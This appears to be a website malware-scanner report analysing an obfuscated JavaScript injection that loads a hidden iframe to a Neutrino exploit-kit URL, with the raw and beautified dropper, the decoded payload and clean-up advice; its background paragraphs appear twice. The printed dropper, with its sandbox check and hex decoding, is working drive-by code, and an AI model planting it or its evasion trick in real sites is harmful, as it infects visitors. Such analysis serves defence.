Malicious JavaScript injects hidden iframe leading to Neutrino exploit
Background
Online Website Malware Scanner has identified a malicious JavaScript code injection in the scanned website. The injected code is obfuscated; when it runs in a visitor's browser it builds an iframe that is invisible to the visitor and loads content from a remote malware-distribution server.
The hidden iframe points the visitor's browser at a URL hosting the Neutrino exploit kit. This kit was relatively new at the time of the scan and targets at least two Java vulnerabilities, CVE-2013-0431 and CVE-2012-1723 (both reachable through the browser's Java plugin). Screenshots of the kit's underground advertisement can be seen in the "Malware don't need Coffee" blog post.
Some of the features the seller advertises for this kit (quoted from the advertisement, so treat them as the seller's claims rather than verified capabilities):
1. Plugin's detector
2. On-going check vs major AV vendors to avoid detection of the main code parts
3. User friendly control panel allows Flow Control, Rotation managing, Exploit selection and e.t.c...
4. Transferring the .exe to the client in the encrypted form.
This particular infected website hosts suspicious JavaScript code injected in 2 files and the breakdown of the detection is provided below.
The hidden iframe points the visitor's browser at a URL hosting the Neutrino exploit kit. This kit was relatively new at the time of the scan and targets at least two Java vulnerabilities, CVE-2013-0431 and CVE-2012-1723 (both reachable through the browser's Java plugin). Screenshots of the kit's underground advertisement can be seen in the "Malware don't need Coffee" blog post.
Some of the features the seller advertises for this kit (quoted from the advertisement, so treat them as the seller's claims rather than verified capabilities):
1. Plugin's detector
2. On-going check vs major AV vendors to avoid detection of the main code parts
3. User friendly control panel allows Flow Control, Rotation managing, Exploit selection and e.t.c...
4. Transferring the .exe to the client in the encrypted form.
This particular infected website hosts suspicious JavaScript code injected in 2 files and the breakdown of the detection is provided below.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources (websites). Here the iframe is 100x100 pixels but absolutely positioned at left:-10000px, so it is rendered far off-screen: the visitor sees nothing, while the browser silently requests the exploit-kit landing page and executes whatever it returns.
Website malware scanner report
Submission date: Sun May 12 11:59:41 2013
Infected website's files: 2
Quttera | Website Security Scan report |
Sitescan report | malicious JavaScript in 2 web pages |
Threat dump: [[<script type='text/javascript' language='javascript' >
// Obfuscated dropper exactly as found in the infected pages (annotated for analysis — do not execute).
// Flow: probe the environment, then hex-decode a second-stage script and pass it to eval.
e=eval; // alias so the literal token "eval(" never appears in the file — presumably signature evasion
v="0"+"x"; // "0x" prefix; turns each hex token below into a numeric literal for eval
a=0;
z="y"; // completes "\x62od"+z == "body" below
try
{
a*=2 // 0*2 cannot throw in standard JS, so a stays 0 and the if(!a) below is always taken
}
catch(q)
{
a=1
}
if(!a)
{
try
{
document["\x62od"+z]++ // document.body++ : stores a number into document.body; a real browser's setter rejects a non-element and throws
}
catch(q)
{
a2="_" // the split delimiter is defined ONLY here — in an emulator where document.body++ does not throw,
       // a2 stays undefined, split(undefined) yields a single token and the decode below produces garbage (sandbox check)
}
z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2); // payload: "_"-separated hex bytes, each = original char code + 7
za="";
for(i=0; // e, v, a, z, a2, za, i and zaz are all implicit globals (no var anywhere)
i<z.length;
i++)
{
za+=String["fromCharCode"](e(v+(z[i]))-4-3); // eval("0x"+token) -> number; -4-3 == -7 -> original character
}
zaz=za; // decoded second stage: the hidden-iframe injector shown under "Malicious payload" below
e(zaz); // execute it
}
</script>]]
Malware entry
Malware entry details.
Beautified script
// Same dropper as the threat dump above, reformatted; each step is summarised in a trailing comment.
- e = eval; // alias hides the literal "eval(" token — presumably to evade simple signatures
- v = "0" + "x"; // "0x" prefix used to turn hex tokens into numbers via eval
- a = 0;
- z = "y"; // later completes "\x62od" + z == "body"
- try {
- a *= 2 // cannot throw for a == 0, so a stays 0 and the if below always runs
- } catch (q) {
- a = 1
- }
- if (!a) {
- try {
- document["\x62od" + z]++ // document.body++ ; throws in real browsers because document.body rejects a non-element value
- } catch (q) {
- a2 = "_" // the split delimiter exists only if that throw happened — emulators that do not throw get a failed decode (sandbox check)
- }
- z ="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2); // "_"-separated hex tokens, each = original char code + 7
- za = "";
- for (i = 0; i < z.length; i++) {
- za += String["fromCharCode"](e(v + (z[i])) - 4 - 3); // eval("0x" + token) - 7 -> character
- }
- zaz = za; // decoded second stage (see "Malicious payload" below)
- e(zaz); // run it
Malicious payload
Decoding scheme: the long string is split on "_" into hexadecimal tokens; each token is prefixed with "0x" and evaluated to a number, reduced by 7 (the `-4-3` in the loop) and converted with String.fromCharCode, and the resulting script is handed to eval. Note that the split delimiter is only set inside the catch handler for `document.body++`, so the decode only succeeds in an environment that behaves like a real browser. The decoded payload injects a hidden iframe pointing at http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751, which leads to the Neutrino exploit kit. Treat the domain rullerstubes.net and this URL as indicators of compromise for log searches and blocking; do not open the URL in a normal browser.
// Second stage produced by the decoder above: injects a 100x100 iframe positioned 10000px off-screen.
// The src URL was a live exploit-kit landing page at the time of analysis — do not open it in a browser.
- if (document.getElementsByTagName('body')[0]) {
- iframer(); // <body> already exists: insert the frame through the DOM
- } else {
- document.write("<iframe src='http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>"); // no <body> yet (e.g. injection sits in <head>): write identical markup straight into the parse stream
- }
- function iframer() {
- var f = document.createElement('iframe');
- f.setAttribute('src', 'http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751'); // same landing URL as the document.write path
- f.style.left = '-10000px'; // pushes the frame far outside the viewport so the victim sees nothing
- f.style.top = '0';
- f.style.position = 'absolute'; // needed for left/top to take effect
- f.style.top = '0'; // duplicate of the assignment two lines up; redundant
- f.setAttribute('width', '100');
- f.setAttribute('height', '100');
- document.getElementsByTagName('body')[0].appendChild(f);
- }
Blacklisting status
At the time of the scan the website was flagged as Suspicious on Google Safe Browsing.
Malware clean-up
Such malware is often hidden inside JavaScript files or appended to existing scripts. Remove the injected script block from both affected files, search the rest of the site (and any backups you intend to restore) for the same pattern — an `eval` alias followed by an underscore-separated hex string decoded with `String["fromCharCode"]` — and, because injections of this kind typically follow stolen FTP/CMS credentials or an unpatched CMS, change those credentials and update the platform before putting the site back online. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.